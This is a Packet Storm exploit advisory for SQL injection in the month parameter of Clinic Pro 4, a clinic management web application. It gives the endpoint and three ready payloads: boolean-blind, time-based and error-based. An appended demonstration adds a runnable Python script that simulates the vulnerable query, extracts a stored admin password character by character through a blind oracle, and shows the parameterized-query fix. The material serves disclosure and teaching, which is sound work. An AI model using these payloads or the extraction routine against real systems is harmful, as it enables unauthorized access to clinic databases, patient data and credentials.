PACKETSTORM:152378

Clinic Pro 4 SQL Injection

2019-04-03
Abdullah Celebi
packetstormsecurity.com
`# Title: Clinic Pro - Clinic Management Software  
# Date: 03.04.2019  
# Exploit Author: Abdullah Çelebi  
# Vendor Homepage: https://softwebinternational.com  
# Software Link: https://cms.softwebinternational.com  
# Category: Webapps  
# Tested on: WAMPP @Win  
# Software description:  
It is developed by PHP Codeigniter Framework with HMVC Pattern. Clinic  
system can be easily configured and fully automated as per clinic  
requirement using this Automation Software.  
  
# Vulnerabilities:  
# An authenticated user can inject SQL through the month parameter of the  
# monthly expense overview and read arbitrary data from the application database.  
  
  
# POC - SQLi :  
  
# Parameter: month (POST)  
# Request URL: http://localhost/welcome/monthly_expense_overview  
# The closing fragment AND '%'=' in each payload re-balances a LIKE '%<month>%'  
# pattern that the submitted value is concatenated into.  
  
# Type : boolean-based blind (a true condition keeps the overview populated, a false one empties it)  
month=06%' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 06 ELSE 0x28 END)) AND '%'='  
  
# Type : time-based blind (the BENCHMARK loop delays the response, proving the injected expression is executed)  
month=06%' AND 4514=BENCHMARK(5000000,MD5(0x436d7970)) AND '%'='  
  
# Type : error-based (EXTRACTVALUE raises an XPath error whose message carries the selected value)  
month=06%' AND EXTRACTVALUE(2633,CONCAT(0x5c,0x7178766271,(SELECT (ELT(2633=2633,1))),0x7171717171)) AND '%'='  
`
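The following is an added example, not code from the advisory or from the Clinic Pro product. It simulates the query shape implied by the payloads above (a POST value concatenated into a `LIKE '%...%'` pattern; that shape, the `expenses` and `users` tables and the secret value are all assumptions constructed for the demonstration) and shows how a boolean-based blind injection turns a "rows returned / no rows returned" signal into character-by-character extraction of data the page never displays. It runs on SQLite, so the MySQL-only `RLIKE`, `BENCHMARK` and `EXTRACTVALUE` tricks from the POC are replaced by a portable `CASE WHEN ... THEN 1 ELSE 0 END` over `substr()`. The hardened handler binds the wildcard pattern as a parameter, which is the general remedy (in CodeIgniter the equivalents are `?` query bindings or the Query Builder `like()` method).

```python
import sqlite3
import string

# Constructed stand-in for the application's database. The real schema is not
# shown in the advisory, so the table and column names here are assumptions.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE expenses (id INTEGER PRIMARY KEY, expense_date TEXT, amount REAL)")
    db.executemany(
        "INSERT INTO expenses (expense_date, amount) VALUES (?, ?)",
        [("2019-06-01", 120.0), ("2019-06-15", 80.5), ("2019-05-03", 42.0)],
    )
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", "s3cret"))
    return db


def monthly_expense_overview_vulnerable(db, month):
    # Assumed shape of the vulnerable query: the POST value is concatenated into a
    # LIKE '%...%' pattern, which is why every payload in the advisory ends with
    # AND '%'=' to re-balance the quotes.
    sql = "SELECT COUNT(*) FROM expenses WHERE expense_date LIKE '%" + month + "%'"
    return db.execute(sql).fetchone()[0]


def monthly_expense_overview_fixed(db, month):
    # Hardened form: the wildcard pattern is bound as a parameter, so quotes and
    # SQL keywords in the input are matched as literal text, never executed.
    sql = "SELECT COUNT(*) FROM expenses WHERE expense_date LIKE ?"
    return db.execute(sql, ("%" + month + "%",)).fetchone()[0]


def oracle(db, condition):
    # Boolean-based blind primitive: inject a condition and read its truth value
    # from whether the overview still returns rows (populated page vs. empty page).
    payload = "06%' AND (" + condition + ") AND '%'='"
    return monthly_expense_overview_vulnerable(db, payload) > 0


def extract_secret(db, max_len=32, charset=string.ascii_letters + string.digits):
    # Recover a value the page never displays, one character per successful oracle
    # query. The CASE WHEN ... THEN 1 ELSE 0 END wrapper mirrors the advisory's
    # boolean payload; substr() stands in for the MySQL-only RLIKE/ELT tricks.
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            condition = (
                "(SELECT CASE WHEN substr((SELECT password FROM users LIMIT 1), %d, 1) = '%s' "
                "THEN 1 ELSE 0 END)" % (pos, ch)
            )
            if oracle(db, condition):
                secret += ch
                break
        else:
            break  # no candidate matched: end of the string
    return secret


if __name__ == "__main__":
    db = build_db()
    print("legit lookup, vulnerable handler:", monthly_expense_overview_vulnerable(db, "06"))
    print("password via blind injection:", extract_secret(db))
    print("same payload against fixed handler:",
          monthly_expense_overview_fixed(db, "06%' AND 1=1 AND '%'='"))
```

The time-based and error-based payloads in the POC are the same oracle read through a different channel: response latency from `BENCHMARK` where the page content gives nothing away, and the text of the database error raised by `EXTRACTVALUE` where errors are echoed to the client. Binding the parameter closes all three at once, because the input never reaches the SQL parser.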